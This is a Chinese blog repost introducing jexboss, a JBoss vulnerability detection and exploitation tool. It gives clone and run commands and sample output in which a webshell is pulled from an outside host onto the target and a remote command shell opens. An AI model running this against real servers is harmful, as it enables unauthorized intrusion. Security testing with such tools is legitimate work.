jexboss – Jboss漏洞检测/利用工具

Posted 黑白之道

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了jexboss – Jboss漏洞检测/利用工具相关的知识,希望对你有一定的参考价值。


项目地址

https://github.com/joaomatosf/jexboss

项目简介

jexboss是一个使用Python编写的Jboss漏洞检测利用工具,通过它可以检测并利用web-console,jmx-console,JMXInvokerServlet这三个漏洞,并且可以获得一个shell。

使用方法

$ git clone https://github.com/joaomatosf/jexboss.git
$ cd jexboss
$ python jexboss.py https://site-teste.com
$ python jexboss.py https://site-teste.com
* — JexBoss: Jboss verify and EXploitation Tool — *
| |
| @author: João Filho Matos Figueiredo |
| @contact: joaomatosf@gmail.com |
| |
| @update: https://github.com/joaomatosf/jexboss |
#______________________________________________________#
** Checking Host: https://site-teste.com **

* Checking web-console: [ OK ]
* Checking jmx-console: [ VULNERABLE ]
* Checking JMXInvokerServlet: [ VULNERABLE ]
* Do you want to try to run an automated exploitation via “jmx-console” ?
This operation will provide a simple command shell to execute commands on the server..
Continue only if you have permission!
yes/NO ? yes

* Sending exploit code to https://site-teste.com. Wait…
* Info: This exploit will force the server to deploy the webshell
available on: http://www.joaomatosf.com/rnp/jbossass.war
* Successfully deployed code! Starting command shell, wait…

* – – – – – – – – – – – – – – – – – – – – LOL – – – – – – – – – – – – – – – – – – – – *

* https://site-teste.com:

Linux seglinux 3.18.4-1.el6.elrepo.x86_64 #1 SMP Wed Jan 28 13:28:52 EST 2015 x86_64 x86_64 x86_64 GNU/Linux

CentOS release 6.5 (Final)

uid=509(jboss) gid=509(jboss) grupos=509(jboss) context=system_u:system_r:initrc_t:s0

[Type commands or “exit” to finish]
Shell> pwd
/usr/jboss-6.1.0.Final/bin


你会喜欢





亲喜欢吗?记得 点赞| 留言| 分享


----------------------------------

要闻、干货、原创、专业
关注“黑白之道” 微信:i77169
华夏黑客同盟我们坚持,自由,免费,共享!


以上是关于jexboss – Jboss漏洞检测/利用工具的主要内容,如果未能解决你的问题,请参考以下文章

JexBoss - JBoss (和其他 Java 反序列化漏洞) 验证和更新工具

JBoss未授权访问漏洞Getshell过程复现

Jboss漏洞利用

分享给新手2个常用的漏洞扫描工具

带你掌握java反序列化漏洞及其检测

2017-2018-2 20179207 《网络攻防技术》第七周作业